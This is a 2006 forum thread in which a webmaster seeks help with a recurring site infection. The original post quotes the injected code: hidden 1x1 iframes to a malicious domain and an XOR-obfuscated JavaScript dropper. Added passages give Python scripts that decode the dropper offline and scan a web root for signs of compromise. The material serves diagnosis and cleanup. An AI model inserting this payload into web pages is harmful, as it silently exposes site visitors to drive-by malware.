Greenguy's Board
#1  xsiteu  2006-12-09, 12:23 AM
Help removing exploits from Host

I have been trying to remove some sort of virus from my host but it keeps coming back.

I have pasted the inserted malicious scripts at the bottom of the page.

Can anyone tell me what I need to do to remove this shit completely?

I have contacted them about it. Their response was that they could not find anything and that nothing on their hosting is causing the problem.

*** WARNING ***

For those that may want to see what is happening, I am posting the link here to my site that currently has this nasty shit. Unless you are 100% sure you have good anti-virus protection, don't click it. I use NOD32 and it immediately blocks the threat.

The website is: http://www.xsiteu.com

Below is what keeps being inserted into my index.html:
-------------------------------------------------------------
<iframe src='http://wsfgfdgrtyhgfd.net/adv/168/new.php' width=1 height=1></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=168' width=1 height=1></iframe>


<script language="JavaScript">e = '0x00' + '27';str1 = "%9C%C4%CF%D2%B8%D5%D4%DF%CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C%CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7%C6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF%C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
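The script posted above is a small decoder: it walks str1 one %XX escape at a time, XORs each byte with e (the string '0x00' + '27', which JavaScript coerces to the number 0x27 = 39), subtracts 127, and document.write()s the result. As an added example, not part of xsiteu's post or of the injected code, here is a Python script that reproduces that arithmetic offline, without running the attacker's JavaScript, and lists every iframe target the page would end up loading, plain or decoded. The index.html it parses is a constructed sample built from the markup posted above; the function names and the regular expressions are assumptions fitted to this one dropper's shape, not a general de-obfuscator. The %XX tokens are matched by regular expression rather than by fixed three-character slices, so an accidental line-wrap space in a pasted copy of str1 does not derail it.

```python
import re

# Constructed sample index.html holding the injected markup as posted in the
# thread: two plain <iframe>s plus the obfuscating <script>.
SAMPLE_INDEX_HTML = """<html><body><h1>site</h1>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/168/new.php' width=1 height=1></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=168' width=1 height=1></iframe>
<script language="JavaScript">e = '0x00' + '27';str1 = "%9C%C4%CF%D2%B8%D5%D4%DF%CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C%CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7%C6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF%C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
</body></html>"""

# Assumption: this dropper always sets its two parameters the same way, a key
# built from two concatenated string literals and a %XX-encoded payload.
OBFUSCATED_SCRIPT_RE = re.compile(
    r"\be\s*=\s*'([^']*)'\s*\+\s*'([^']*)'\s*;\s*str1\s*=\s*\"([^\"]*)\"")
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def js_tonumber(text):
    """Mimic JavaScript's ToNumber on the key string: '0x0027' -> 39.
    Only the hex and plain-decimal forms this dropper uses are handled."""
    text = text.strip()
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def decode_xor_payload(str1, key):
    """Reproduce the script's loop without executing it: each %XX byte is
    XORed with the numeric key, then 127 is subtracted to get a char code."""
    k = js_tonumber(key)
    return "".join(chr((int(hx, 16) ^ k) - 127)
                   for hx in re.findall(r"%([0-9A-Fa-f]{2})", str1))


def decode_obfuscated_scripts(html):
    """Return the cleartext each obfuscated <script> in `html` would document.write()."""
    return [decode_xor_payload(str1, left + right)
            for left, right, str1 in OBFUSCATED_SCRIPT_RE.findall(html)]


def find_injected_iframes(html):
    """Every <iframe src=...> target in the page, plain or hidden inside the
    obfuscated script, sorted and de-duplicated."""
    srcs = set(IFRAME_SRC_RE.findall(html))
    for clear in decode_obfuscated_scripts(html):
        srcs.update(IFRAME_SRC_RE.findall(clear))
    return sorted(srcs)


if __name__ == "__main__":
    for clear in decode_obfuscated_scripts(SAMPLE_INDEX_HTML):
        print("decoded:", clear)
    for src in find_injected_iframes(SAMPLE_INDEX_HTML):
        print("iframe ->", src)
```

Running it prints the decoded markup, which is a third, invisible iframe wrapped in a visibility:hidden div, followed by the three iframe URLs. Run find_injected_iframes() over every HTML file on the host rather than just index.html; the same dropper rewrites any default page it can reach.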
#2  cd34 (a.k.a. Sparky)  2006-12-09, 02:10 AM
Change your FTP password. This exploit comes in through an FTP session that logs in, grabs the current file, changes it, and puts the file back within seconds. Obviously automated, but that particular string is always updated via FTP.
#3  xsiteu  2006-12-09, 06:51 AM
FTP accounts modified

Thanks, cd34.

I immediately went in to change my FTP accounts and discovered, to my amazement, that anonymous FTP was enabled on this particular domain. No idea how or why.

I removed that and changed all the account passwords to be sure. I have now removed the malicious code again. Time will tell, but I am confident that you have identified the problems.
#4  onroad  2006-12-09, 12:02 PM
Sadly, FTP won't solve the problem. I just wasted days trying to get that same string off a domain I had. I had changed my password 5 times and it kept coming back. For some reason, when the domain was set up, "public write" was enabled. A few months back a bot must have seen this and added a file to a few folders. It had a sneaky name, "backup.pl"; at a glance I assumed it was something my host was using for backup reasons. But I see the ".pl" extension is a Linux Shell Executable Binary: http://filext.com/alphalist.php?extstart=%5EP

It runs right off the server once installed. I noticed it was changing all the "default" pages, i.e. index, main.htm, etc. There was also a PHP file that cloned the name of the folder it was placed in. I opened both of these in Notepad and they were nothing I installed. They are long code which I'm too stupid to understand. But if somebody wants me to paste it into a response, I can do that.

Anyway, all I can suggest is: contact your host and ensure "public write" and any other weakness is not on the server. Then look in all your folders for those .php and .pl file extensions. I hope this helps... BTW, it clones the "Real Player" update skin, correct? I think it's on http://www.internext-expo.com/ also; I get the same popup there.

Oh, not to stomp on cd34. He's the shit! But mine could have been different from that guy's in a way, and changing my FTP didn't help in my case. I was actually thinking about asking Sparky for some help until I noticed the problem...

Last edited by onroad; 2006-12-09 at 12:07 PM..
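onroad's sweep advice (get "public write" turned off, then look in every folder for stray .php and .pl files, one of which copied its folder's name) is easy to script. As an added example that is not part of the post, the Python below walks a web root and reports world-writable directories, files with a server-side script extension, script files named after the directory they sit in, and anything modified in the last couple of days. The demo tree it builds is constructed (names such as images/backup.pl are chosen to mirror the post, not taken from a real host); the .cgi extension, the two-day window and the function names are assumptions. Note that .pl is the conventional extension for a Perl script, which a web host's Perl interpreter will run directly; that is why a dropped backup.pl can keep rewriting pages on its own.

```python
import os
import stat
import tempfile
import time

# Assumption: extensions to flag. The post names .pl and .php; .cgi is added
# because hosts of that era commonly executed it the same way.
SCRIPT_EXTS = (".pl", ".php", ".cgi")


def sweep_webroot(root, days=2, now=None):
    """Walk `root` and return the file-system indicators described in the post.

    Each value is a sorted list of paths relative to `root`:
      world_writable_dirs  directories with the "other write" bit set
                           (the "public write" misconfiguration)
      script_files         files ending in one of SCRIPT_EXTS
      dir_named_scripts    script files named after the folder they sit in
      recently_changed     files modified within the last `days` days
    `now` (seconds since the epoch) is overridable so the cutoff is testable.
    """
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    keys = ("world_writable_dirs", "script_files", "dir_named_scripts", "recently_changed")
    found = {k: [] for k in keys}
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.lstat(dirpath).st_mode & stat.S_IWOTH:
            found["world_writable_dirs"].append(os.path.relpath(dirpath, root))
        dir_name = os.path.basename(os.path.normpath(dirpath))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            base, ext = os.path.splitext(name)
            if ext.lower() in SCRIPT_EXTS:
                found["script_files"].append(rel)
                if base == dir_name:          # e.g. thumbs/thumbs.php
                    found["dir_named_scripts"].append(rel)
            if os.lstat(path).st_mtime >= cutoff:
                found["recently_changed"].append(rel)
    return {k: sorted(v) for k, v in found.items()}


def build_demo_webroot():
    """Constructed sample tree mirroring the post: a world-writable images/
    folder holding a dropped backup.pl and a thumbs/thumbs.php clone."""
    root = tempfile.mkdtemp(prefix="webroot_")   # mkdtemp creates root as 0700
    thumbs = os.path.join(root, "images", "thumbs")
    os.makedirs(thumbs)
    for rel in ("index.html", "images/backup.pl", "images/thumbs/thumbs.php"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("sample\n")
    os.chmod(thumbs, 0o755)                            # a normal directory
    os.chmod(os.path.join(root, "images"), 0o777)      # the "public write" mistake
    return root


if __name__ == "__main__":
    demo = build_demo_webroot()
    for key, paths in sweep_webroot(demo).items():
        print(key)
        for p in paths:
            print("   ", p)
```

Point sweep_webroot() at the real document root (and at cgi-bin, if it is separate) and read the output with the post in mind: a world-writable directory is the entry point, a script file you did not upload is the persistence, and a batch of default pages all modified at the same minute is the bot's last run.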
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc